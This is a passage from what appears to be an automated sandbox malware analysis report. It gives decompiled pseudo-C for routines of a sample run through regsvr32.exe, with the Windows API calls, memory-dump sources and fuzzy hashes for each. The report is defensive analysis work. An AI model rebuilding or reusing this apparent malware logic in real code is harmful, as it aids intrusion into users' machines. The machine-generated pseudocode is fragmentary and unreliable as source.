                                    				_t81 = E001A77D7(_t122 << 2);
                                    				_v16 = _t81;
                                    				if(_t81 == 0) {
                                    					_push(8);
                                    					_pop(0);
                                    					L37:
                                    					return 0;
                                    				}
                                    				_t107 = _a4;
                                    				_a4 = _t102;
                                    				_t113 = 0;
                                    				while(1) {
                                    					_t83 =  *_t107;
                                    					if(_t83 == 0) {
                                    						break;
                                    					}
                                    					if(_t83 == 0xd || _t83 == 0xa) {
                                    						if(_t118 != 0) {
                                    							if(_t118 > _v8) {
                                    								_v8 = _t118;
                                    							}
                                    							_a8 = _a8 + 1;
                                    							_t118 = 0;
                                    						}
                                    						 *_t107 = 0;
                                    						goto L16;
                                    					} else {
                                    						if(_t118 != 0) {
                                    							L10:
                                    							_t118 = _t118 + 1;
                                    							L16:
                                    							_t107 = _t107 + 1;
                                    							_t15 =  &_a4;
                                    							 *_t15 = _a4 - 1;
                                    							if( *_t15 != 0) {
                                    								continue;
                                    							}
                                    							break;
                                    						}
                                    						if(_t113 == _t122) {
                                    							L21:
                                    							if(_a8 <= 0x20) {
                                    								_push(0xb);
                                    								L34:
                                    								_pop(0);
                                    								L35:
                                    								E001A77EC(_v16);
                                    								goto L37;
                                    							}
                                    							_t103 = E001A77D7((_v8 + _v8 + 5) * _a8 + 4);
                                    							if(_t103 == 0) {
                                    								_push(8);
                                    								goto L34;
                                    							}
                                    							_t90 = _a8;
                                    							_a4 = _a4 & 0x00000000;
                                    							_v8 = _v8 & 0x00000000;
                                    							_t124 = _t103 + _t90 * 4;
                                    							if(_t90 <= 0) {
                                    								L31:
                                    								 *0x1aa2cc = _t103;
                                    								goto L35;
                                    							}
                                    							do {
                                    								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                    								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                    								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                    								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                    								_v12 = _v12 & 0x00000000;
                                    								if(_a4 <= 0) {
                                    									goto L30;
                                    								} else {
                                    									goto L26;
                                    								}
                                    								while(1) {
                                    									L26:
                                    									_t99 = _v12;
                                    									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
                                    									if(_t99 == 0) {
                                    										break;
                                    									}
                                    									_v12 = _v12 + 1;
                                    									if(_v12 < _a4) {
                                    										continue;
                                    									}
                                    									goto L30;
                                    								}
                                    								_v8 = _v8 - 1;
                                    								L30:
                                    								_t97 = _a4;
                                    								_a4 = _a4 + 1;
                                    								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                    								__imp__(_t124);
                                    								_v8 = _v8 + 1;
                                    								_t124 = _t124 + _t97 + 1;
                                    							} while (_v8 < _a8);
                                    							goto L31;
                                    						}
                                    						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                    						_t101 = _t83;
                                    						if(_t83 - 0x61 <= 0x19) {
                                    							_t101 = _t101 - 0x20;
                                    						}
                                    						 *_t107 = _t101;
                                    						_t113 = _t113 + 1;
                                    						goto L10;
                                    					}
                                    				}
                                    				if(_t118 != 0) {
                                    					if(_t118 > _v8) {
                                    						_v8 = _t118;
                                    					}
                                    					_a8 = _a8 + 1;
                                    				}
                                    				goto L21;
                                    			}






















                                    APIs
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                    • lstrcpy.KERNEL32(69B25F45,00000020), ref: 001A1BD9
                                    • lstrcat.KERNEL32(69B25F45,00000020), ref: 001A1BEE
                                    • lstrcmp.KERNEL32(00000000,69B25F45), ref: 001A1C05
                                    • lstrlen.KERNEL32(69B25F45), ref: 001A1C29
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                    • String ID:
                                    • API String ID: 3214092121-3916222277
                                    • Opcode ID: 85ff2b6144c238a96e8bc996e505e437a4119be6818ece9fe048d9b76f8968da
                                    • Instruction ID: 4cc33db26f910abfde7c8f4ea7333c7d605ec0d14d8d8a77c528455fa53a7bfd
                                    • Opcode Fuzzy Hash: 85ff2b6144c238a96e8bc996e505e437a4119be6818ece9fe048d9b76f8968da
                                    • Instruction Fuzzy Hash: A651F539A40208FFCF10CF98C9846ADBBBAFF46360F15C05AE8159B251D730AA41CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E001A4EEF(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                    				intOrPtr* _v8;
                                    				void* _t17;
                                    				intOrPtr* _t22;
                                    				void* _t27;
                                    				char* _t30;
                                    				void* _t33;
                                    				void* _t34;
                                    				void* _t36;
                                    				void* _t37;
                                    				void* _t39;
                                    				int _t42;
                                    
                                    				_t17 = __eax;
                                    				_t37 = 0;
                                    				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                    				_t2 = _t17 + 1; // 0x1
                                    				_t28 = _t2;
                                    				_t34 = E001A77D7(_t2);
                                    				if(_t34 != 0) {
                                    					_t30 = E001A77D7(_t28);
                                    					if(_t30 == 0) {
                                    						E001A77EC(_t34);
                                    					} else {
                                    						_t39 = _a4;
                                    						_t22 = E001A783A(_t39);
                                    						_v8 = _t22;
                                    						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                    							_a4 = _t39;
                                    						} else {
                                    							_t26 = _t22 + 2;
                                    							_a4 = _t22 + 2;
                                    							_t22 = E001A783A(_t26);
                                    							_v8 = _t22;
                                    						}
                                    						if(_t22 == 0) {
                                    							__imp__(_t34, _a4);
                                    							 *_t30 = 0x2f;
                                    							 *((char*)(_t30 + 1)) = 0;
                                    						} else {
                                    							_t42 = _t22 - _a4;
                                    							memcpy(_t34, _a4, _t42);
                                    							 *((char*)(_t34 + _t42)) = 0;
                                    							__imp__(_t30, _v8);
                                    						}
                                    						 *_a8 = _t34;
                                    						_t37 = 1;
                                    						 *_a12 = _t30;
                                    					}
                                    				}
                                    				return _t37;
                                    			}















                                    APIs
                                    • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,001A69C2,00000000,00000000,00000000,032F98C0,?,?,001A3771,?,032F98C0), ref: 001A4EFB
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                      • Part of subcall function 001A783A: StrChrA.SHLWAPI(?,0000002F), ref: 001A7848
                                      • Part of subcall function 001A783A: StrChrA.SHLWAPI(?,0000003F), ref: 001A7852
                                    • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,001A69C2,00000000,00000000,00000000,032F98C0,?,?,001A3771), ref: 001A4F59
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 001A4F69
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 001A4F75
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                    • String ID: b+t
                                    • API String ID: 3767559652-83008628
                                    • Opcode ID: 70714f91bbb24cb0420505dd03d2553861ca8c746855668912c9ed46135fdb60
                                    • Instruction ID: 78407025f10b948320bde9822325c9d2905819a9493c3343fb3400653cd56d9f
                                    • Opcode Fuzzy Hash: 70714f91bbb24cb0420505dd03d2553861ca8c746855668912c9ed46135fdb60
                                    • Instruction Fuzzy Hash: 8121AF7A504255AFCB025F68CC88AAF7FACAF57390F159094F9089B212DB74CA40C7E1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 6E2C83DB
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6E2C83FE
                                      • Part of subcall function 6E2C6950: RtlAllocateHeap.NTDLL(00000000,?), ref: 6E2C6982
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6E2C8424
                                    • _free.LIBCMT ref: 6E2C8437
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E2C8446
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                    • String ID:
                                    • API String ID: 336800556-0
                                    • Opcode ID: d444b5575eeb802b250e98497673b8c9a7b7a23817788829ce94adfdfd434894
                                    • Instruction ID: 1b734d49a8305e8f992c2543d0b3e512dd12441ee4d3843b40d8b280f15d9c11
                                    • Opcode Fuzzy Hash: d444b5575eeb802b250e98497673b8c9a7b7a23817788829ce94adfdfd434894
                                    • Instruction Fuzzy Hash: 8A019272601A1A7B27A516FADC8DC7B2A6EDBC2EA13554228B918D3100DE609C0181B2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,6E2C75B2,6E2C6993,?,?,6E2C382D,?), ref: 6E2C6DC5
                                    • _free.LIBCMT ref: 6E2C6DFA
                                    • _free.LIBCMT ref: 6E2C6E21
                                    • SetLastError.KERNEL32(00000000), ref: 6E2C6E2E
                                    • SetLastError.KERNEL32(00000000), ref: 6E2C6E37
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID:
                                    • API String ID: 3170660625-0
                                    • Opcode ID: aa0031677a3b4547e02c31454ab481070e75c626e079e7ed27bc85819a246c3e
                                    • Instruction ID: 268eee2d01c56333cb57c9f6b67c42472556e40962f58a0c5b9f239cb29643b5
                                    • Opcode Fuzzy Hash: aa0031677a3b4547e02c31454ab481070e75c626e079e7ed27bc85819a246c3e
                                    • Instruction Fuzzy Hash: 2501D6361B49096BD6D216F9CCCDD6B236FDBC2F7A7240729F51992184EBA5CC0181B3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _free.LIBCMT ref: 6E2CA44D
                                      • Part of subcall function 6E2C761D: HeapFree.KERNEL32(00000000,00000000), ref: 6E2C7633
                                      • Part of subcall function 6E2C761D: GetLastError.KERNEL32(?,?,6E2CA4CC,?,00000000,?,00000000,?,6E2CA4F3,?,00000007,?,?,6E2C90D9,?,?), ref: 6E2C7645
                                    • _free.LIBCMT ref: 6E2CA45F
                                    • _free.LIBCMT ref: 6E2CA471
                                    • _free.LIBCMT ref: 6E2CA483
                                    • _free.LIBCMT ref: 6E2CA495
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: ec1189b3d21de8e687a229b1b7c7e399505192bc5d456097c706189c02baab46
                                    • Instruction ID: 6b4cc89b569b84462a250d8c2d96eec2ad255cbea6bb4c7962f6181d06c2f8c1
                                    • Opcode Fuzzy Hash: ec1189b3d21de8e687a229b1b7c7e399505192bc5d456097c706189c02baab46
                                    • Instruction Fuzzy Hash: B4F0E17195464D978AD0DBE9E4DEC5673DFEA01F257604D05F06BD7540CB20F8808EE5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E001A6707(intOrPtr _a4) {
                                    				void* _t2;
                                    				long _t4;
                                    				void* _t5;
                                    				long _t6;
                                    				void* _t7;
                                    
                                    				_t2 = CreateEventA(0, 1, 0, 0);
                                    				 *0x1aa2c4 = _t2;
                                    				if(_t2 == 0) {
                                    					return GetLastError();
                                    				}
                                    				_t4 = GetVersion();
                                    				if(_t4 <= 5) {
                                    					_t5 = 0x32;
                                    					return _t5;
                                    				}
                                    				 *0x1aa2b4 = _t4;
                                    				_t6 = GetCurrentProcessId();
                                    				 *0x1aa2b0 = _t6;
                                    				 *0x1aa2bc = _a4;
                                    				_t7 = OpenProcess(0x10047a, 0, _t6);
                                    				 *0x1aa2ac = _t7;
                                    				if(_t7 == 0) {
                                    					 *0x1aa2ac =  *0x1aa2ac | 0xffffffff;
                                    				}
                                    				return 0;
                                    			}









                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001A6671,?,?,00000001), ref: 001A670F
                                    • GetVersion.KERNEL32(?,00000001), ref: 001A671E
                                    • GetCurrentProcessId.KERNEL32(?,00000001), ref: 001A672D
                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 001A674A
                                    • GetLastError.KERNEL32(?,00000001), ref: 001A6769
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                    • String ID:
                                    • API String ID: 2270775618-0
                                    • Opcode ID: 44f01dd57443d58f91c27db9a50e74bf28bcaff82c9fd7e0b5f015165dbb649f
                                    • Instruction ID: e274a9da951048bea9a92e2229142d3fff5244eb1345c35370681363d2ba1799
                                    • Opcode Fuzzy Hash: 44f01dd57443d58f91c27db9a50e74bf28bcaff82c9fd7e0b5f015165dbb649f
                                    • Instruction Fuzzy Hash: 60F0BE78A54301DFD7508FB4AE09B263BB9AB07B80F54841AF106CA9E0D37188D0CF26
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 6E2C4843
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 6E2C48FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                    • String ID: <X,n$csm
                                    • API String ID: 3480331319-4094644948
                                    • Opcode ID: 09d91c701d2a3e681ec5408f58fedfb9c7c05426af0ca75d769c9ef0f4190e1b
                                    • Instruction ID: 08fb18a6f927be6398a179a90e725409d78d065ad172983129a2113cbe43a03d
                                    • Opcode Fuzzy Hash: 09d91c701d2a3e681ec5408f58fedfb9c7c05426af0ca75d769c9ef0f4190e1b
                                    • Instruction Fuzzy Hash: C041E734D1015EABCF80CF98C844A9FBBB6BF45B28F108355D9159B351C7319A16CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\regsvr32.exe,00000104), ref: 6E2C5E98
                                    • _free.LIBCMT ref: 6E2C5F63
                                    • _free.LIBCMT ref: 6E2C5F6D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674596109.000000006E2AE000.00000020.00020000.sdmp, Offset: 6E2AE000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2ae000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _free$FileModuleName
                                    • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                    • API String ID: 2506810119-3922119987
                                    • Opcode ID: be3c452401bdb698f369228116a307afaacdda58bea63885b77c7763ff0c0075
                                    • Instruction ID: e6dda1b7837dd63df333727df1ab53975525fe59812bb235a67d8629d6965e41
                                    • Opcode Fuzzy Hash: be3c452401bdb698f369228116a307afaacdda58bea63885b77c7763ff0c0075
                                    • Instruction Fuzzy Hash: 8431B57199421DAFDB91CFD9C884DDEBBFEEF8AB10B104256E80497240D7B08A41CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 46%
                                    			E001A2CA0(intOrPtr* __eax) {
                                    				void* _v8;
                                    				WCHAR* _v12;
                                    				void* _v16;
                                    				char _v20;
                                    				void* _v24;
                                    				intOrPtr _v28;
                                    				void* _v32;
                                    				intOrPtr _v40;
                                    				short _v48;
                                    				intOrPtr _v56;
                                    				short _v64;
                                    				intOrPtr* _t54;
                                    				intOrPtr* _t56;
                                    				intOrPtr _t57;
                                    				intOrPtr* _t58;
                                    				intOrPtr* _t60;
                                    				void* _t61;
                                    				intOrPtr* _t63;
                                    				intOrPtr* _t65;
                                    				intOrPtr* _t67;
                                    				intOrPtr* _t69;
                                    				intOrPtr* _t71;
                                    				intOrPtr* _t74;
                                    				intOrPtr* _t76;
                                    				intOrPtr _t78;
                                    				intOrPtr* _t82;
                                    				intOrPtr* _t86;
                                    				intOrPtr _t102;
                                    				intOrPtr _t108;
                                    				void* _t117;
                                    				void* _t121;
                                    				void* _t122;
                                    				intOrPtr _t129;
                                    
                                    				_t122 = _t121 - 0x3c;
                                    				_push( &_v8);
                                    				_push(__eax);
                                    				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                                    				if(_t117 >= 0) {
                                    					_t54 = _v8;
                                    					_t102 =  *0x1aa2d4; // 0x314d7d0
                                    					_t5 = _t102 + 0x1ab038; // 0x3050f485
                                    					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                    					_t56 = _v8;
                                    					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                    					if(_t117 >= 0) {
                                    						__imp__#2(0x1a92b0);
                                    						_v28 = _t57;
                                    						if(_t57 == 0) {
                                    							_t117 = 0x8007000e;
                                    						} else {
                                    							_t60 = _v32;
                                    							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                    							_t86 = __imp__#6;
                                    							_t117 = _t61;
                                    							if(_t117 >= 0) {
                                    								_t63 = _v24;
                                    								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                    								if(_t117 >= 0) {
                                    									_t129 = _v20;
                                    									if(_t129 != 0) {
                                    										_v64 = 3;
                                    										_v48 = 3;
                                    										_v56 = 0;
                                    										_v40 = 0;
                                    										if(_t129 > 0) {
                                    											while(1) {
                                    												_t67 = _v24;
                                    												asm("movsd");
                                    												asm("movsd");
                                    												asm("movsd");
                                    												asm("movsd");
                                    												_t122 = _t122;
                                    												asm("movsd");
                                    												asm("movsd");
                                    												asm("movsd");
                                    												asm("movsd");
                                    												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                                    												if(_t117 < 0) {
                                    													goto L16;
                                    												}
                                    												_t69 = _v8;
                                    												_t108 =  *0x1aa2d4; // 0x314d7d0
                                    												_t28 = _t108 + 0x1ab0bc; // 0x3050f1ff
                                    												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                                    												if(_t117 >= 0) {
                                    													_t74 = _v16;
                                    													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                                    													if(_t117 >= 0 && _v12 != 0) {
                                    														_t78 =  *0x1aa2d4; // 0x314d7d0
                                    														_t33 = _t78 + 0x1ab078; // 0x76006f
                                    														if(lstrcmpW(_v12, _t33) == 0) {
                                    															_t82 = _v16;
                                    															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                                    														}
                                    														 *_t86(_v12);
                                    													}
                                    													_t76 = _v16;
                                    													 *((intOrPtr*)( *_t76 + 8))(_t76);
                                    												}
                                    												_t71 = _v8;
                                    												 *((intOrPtr*)( *_t71 + 8))(_t71);
                                    												_v40 = _v40 + 1;
                                    												if(_v40 < _v20) {
                                    													continue;
                                    												}
                                    												goto L16;
                                    											}
                                    										}
                                    									}
                                    								}
                                    								L16:
                                    								_t65 = _v24;
                                    								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                    							}
                                    							 *_t86(_v28);
                                    						}
                                    						_t58 = _v32;
                                    						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                    					}
                                    				}
                                    				return _t117;
                                    			}

                                    APIs
                                    • SysAllocString.OLEAUT32(001A92B0), ref: 001A2CF0
                                    • lstrcmpW.KERNEL32(00000000,0076006F), ref: 001A2DD2
                                    • SysFreeString.OLEAUT32(00000000), ref: 001A2DEB
                                    • SysFreeString.OLEAUT32(?), ref: 001A2E1A
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: String$Free$Alloclstrcmp
                                    • String ID:
                                    • API String ID: 1885612795-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SysAllocString.OLEAUT32(00000000), ref: 001A2160
                                    • SysFreeString.OLEAUT32(00000000), ref: 001A2243
                                      • Part of subcall function 001A2CA0: SysAllocString.OLEAUT32(001A92B0), ref: 001A2CF0
                                    • SafeArrayDestroy.OLEAUT32(?), ref: 001A2297
                                    • SysFreeString.OLEAUT32(?), ref: 001A22A5
                                      • Part of subcall function 001A2B38: Sleep.KERNEL32(000001F4), ref: 001A2B80
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: String$AllocFree$ArrayDestroySafeSleep
                                    • String ID:
                                    • API String ID: 3193056040-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 90%
                                    			E001A1D8C(void* __eflags, int _a4) {
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				WCHAR* _v20;
                                    				char* _v24;
                                    				int _v28;
                                    				void* _v40;
                                    				char _v44;
                                    				char _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				void _v88;
                                    				char _v92;
                                    				void* __esi;
                                    				intOrPtr _t42;
                                    				intOrPtr _t44;
                                    				intOrPtr _t53;
                                    				void* _t55;
                                    				void* _t67;
                                    				void* _t76;
                                    				WCHAR* _t80;
                                    				intOrPtr _t82;
                                    
                                    				_v92 = 0;
                                    				memset( &_v88, 0, 0x2c);
                                    				_v44 = 0;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				_t42 =  *0x1aa2cc; // 0x32f9f00
                                    				_t5 = _t42 + 0x48; // 0x32fa0a0
                                    				_t82 =  *_t5;
                                    				_t6 = _t42 + 0x4c; // 0x32fa0ad
                                    				_v16 =  *_t6;
                                    				_t44 =  *0x1aa2d4; // 0x314d7d0
                                    				_t8 = _t44 + 0x1abdd0; // 0x410025
                                    				_t80 = E001A564D(_t8);
                                    				_v20 = _t80;
                                    				if(_t80 == 0) {
                                    					_t76 = 8;
                                    					L24:
                                    					return _t76;
                                    				}
                                    				if(StrCmpNIW(_t80, _a4, lstrlenW(_t80)) != 0) {
                                    					_t76 = 1;
                                    					L22:
                                    					E001A77EC(_v20);
                                    					goto L24;
                                    				}
                                    				if(E001A1FBC(0,  &_a4) != 0) {
                                    					_a4 = 0;
                                    				}
                                    				_t53 = E001A5691(_t52,  *0x1aa38c);
                                    				_v12 = _t53;
                                    				if(_t53 == 0) {
                                    					_t76 = 8;
                                    					goto L19;
                                    				} else {
                                    					_t55 = E001A5691(_t53, _t82);
                                    					_t84 = _t55;
                                    					if(_t55 == 0) {
                                    						_t76 = 8;
                                    					} else {
                                    						_t76 = E001A15D7(_a4, 0x80000001, _v12, _t84,  &_v92,  &_v88);
                                    						_t55 = E001A77EC(_t84);
                                    					}
                                    					if(_t76 != 0) {
                                    						L17:
                                    						E001A77EC(_v12);
                                    						L19:
                                    						_t83 = _a4;
                                    						if(_a4 != 0) {
                                    							E001A44B9(_t83);
                                    						}
                                    						goto L22;
                                    					} else {
                                    						if(( *0x1aa2b8 & 0x00000001) == 0) {
                                    							L14:
                                    							E001A1C69(_v88, _v92, _v92,  *0x1aa2c8, 0);
                                    							_t76 = E001A23B6(_v92,  &_v84,  &_v80, 0);
                                    							if(_t76 == 0) {
                                    								_v28 = _a4;
                                    								_v24 =  &_v92;
                                    								_t76 = E001A43C6( &_v44, 0);
                                    							}
                                    							E001A77EC(_v92);
                                    							goto L17;
                                    						}
                                    						_t67 = E001A5691(_t55, _v16);
                                    						_t86 = _t67;
                                    						if(_t67 == 0) {
                                    							_t76 = 8;
                                    						} else {
                                    							_t76 = E001A15D7(_a4, 0x80000001, _v12, _t86,  &_v76,  &_v72);
                                    							E001A77EC(_t86);
                                    						}
                                    						if(_t76 != 0) {
                                    							goto L17;
                                    						} else {
                                    							goto L14;
                                    						}
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • memset.NTDLL ref: 001A1DA1
                                      • Part of subcall function 001A564D: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,032FA0A0,00000000,001A1DD5,00410025,00000001,00000000,754B94D8), ref: 001A565E
                                      • Part of subcall function 001A564D: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 001A567B
                                    • lstrlenW.KERNEL32(00000000,00410025,00000001,00000000,754B94D8), ref: 001A1DE3
                                    • StrCmpNIW.SHLWAPI(00000000,001A5FD8,00000000), ref: 001A1DEE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: EnvironmentExpandStrings$lstrlenmemset
                                    • String ID: EG@u~Bu
                                    • API String ID: 3817122888-1195135033
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 85%
                                    			E001A67C4(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				signed int _v16;
                                    				void _v156;
                                    				void _v428;
                                    				void* _t55;
                                    				unsigned int _t56;
                                    				signed int _t66;
                                    				signed int _t74;
                                    				void* _t76;
                                    				signed int _t79;
                                    				void* _t81;
                                    				void* _t92;
                                    				void* _t96;
                                    				signed int* _t99;
                                    				signed int _t101;
                                    				signed int _t103;
                                    				void* _t107;
                                    
                                    				_t92 = _a12;
                                    				_t101 = __eax;
                                    				_t55 = E001A4E19(_a16, _t92);
                                    				_t79 = _t55;
                                    				if(_t79 == 0) {
                                    					L18:
                                    					return _t55;
                                    				}
                                    				_t56 =  *(_t92 + _t79 * 4 - 4);
                                    				_t81 = 0;
                                    				_t96 = 0x20;
                                    				if(_t56 == 0) {
                                    					L4:
                                    					_t97 = _t96 - _t81;
                                    					_v12 = _t96 - _t81;
